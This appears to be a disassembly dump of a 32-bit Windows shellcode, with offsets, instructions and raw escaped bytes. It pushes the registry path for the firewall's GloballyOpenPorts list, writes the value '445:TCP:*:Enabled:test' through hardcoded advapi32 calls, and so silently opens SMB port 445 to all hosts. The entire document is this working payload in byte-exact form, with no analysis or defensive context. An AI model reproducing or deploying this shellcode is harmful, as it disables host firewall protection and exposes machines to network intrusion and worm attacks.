0x0        xor edx, edx                        \x31\xd2                  1.        
0x2        mov edi, esp                        \x89\xe7                  ..        
0x4        mov dword ptr [edi], edx            \x89\x17                  ..        
0x6        sub esp, 0x10                       \x81\xec\x10\x00\x00\x00  ......    
0xc        push 0x747369                       \x68\x69\x73\x74\x00      hist.     
0x11       hts\LhnPorhyOpehballh\GlohfilehdProhndarh\Stahlicyhllpohrewahs\Fiheterharamhss\PhAcceharedhs\Shhviceh\SerhlSethntrohntCohurrehEM\ChSYST ; string\x68\x74\x73\x5c\x4c\x68\x6e\x50\x6f\x72\x68\x79\x4f\x70\x65\x68\x62\x61\x6c\x6c\x68\x5c\x47\x6c\x6f\x68\x66\x69\x6c\x65\x68\x64\x50\x72\x6f\x68\x6e\x64\x61\x72\x68\x5c\x53\x74\x61\x68\x6c\x69\x63\x79\x68\x6c\x6c\x70\x6f\x68\x72\x65\x77\x61\x68\x73\x5c\x46\x69\x68\x65\x74\x65\x72\x68\x61\x72\x61\x6d\x68\x73\x73\x5c\x50\x68\x41\x63\x63\x65\x68\x61\x72\x65\x64\x68\x73\x5c\x53\x68\x68\x76\x69\x63\x65\x68\x5c\x53\x65\x72\x68\x6c\x53\x65\x74\x68\x6e\x74\x72\x6f\x68\x6e\x74\x43\x6f\x68\x75\x72\x72\x65\x68\x45\x4d\x5c\x43\x68\x53\x59\x53\x54          
0x98       db 0x89 (!)                        \x89                      .         
0x99       db 0xe2 (!)                        \xe2                      .         
0x9a       db 0x31 (!)                        \x31                      1         
0x9b       db 0xc0 (!)                        \xc0                      .         
0x9c       PWPh? ; string                     \x50\x57\x50\x68\x3f                
0xa1       db 0x00 (!)                        \x00                      .         
0xa2       db 0x0f (!)                        \x0f                      .         
0xa3       db 0x00 (!)                        \x00                      .         
0xa4       PPPRh ; string                     \x50\x50\x50\x52\x68                
0xa9       add al, byte ptr [eax]              \x02\x00                  ..        
0xab       add byte ptr [eax - 0x22161b48], al \x00\x80\xb8\xe4\xe9\xdd  ......    
0xb1       ja 0xb2                             \x77\xff                  w.        

0xb3       shr byte ptr [eax + 0x54], 1        \xd0\x68\x54              .hT       
0xb6       inc ebx                             \x43                      C         
0xb7       push eax                            \x50                      P         
0xb8       add byte ptr [eax + 0x34], ch       \x00\x68\x34              .h4       
0xbb       xor al, 0x35                        \x34\x35                  45        
0xbd       cmp cl, byte ptr [ecx + 0x747368e2] \x3a\x89\xe2\x68\x73\x74  :..hst    
0xc3       add byte ptr [eax], al              \x00\x00                  ..        
0xc5       hd:tehableh*:EnhTCP:h445: ; string \x68\x64\x3a\x74\x65\x68\x61\x62\x6c\x65\x68\x2a\x3a\x45\x6e\x68\x54\x43\x50\x3a\x68\x34\x34\x35\x3a          
0xde       mov ecx, esp                        \x89\xe1                  ..        
0xe0       xor eax, eax                        \x31\xc0                  1.        
0xe2       inc eax                             \x40                      @         
0xe3       push 0x16                           \x68\x16\x00\x00\x00      h....     
0xe8       QPHPR ; string                     \x51\x50\x48\x50\x52                
0xed       push dword ptr [edi]                \xff\x37                  .7        
0xef       mov eax, 0x77ddead7                 \xb8\xd7\xea\xdd\x77      ....w     
0xf4       call eax                            \xff\xd0                  ..        
0xf6       push dword ptr [edi]                \xff\x37                  .7        
0xf8       mov eax, 0x77dd6c17                 \xb8\x17\x6c\xdd\x77      ..l.w     
0xfd       call eax                            \xff\xd0                  ..        
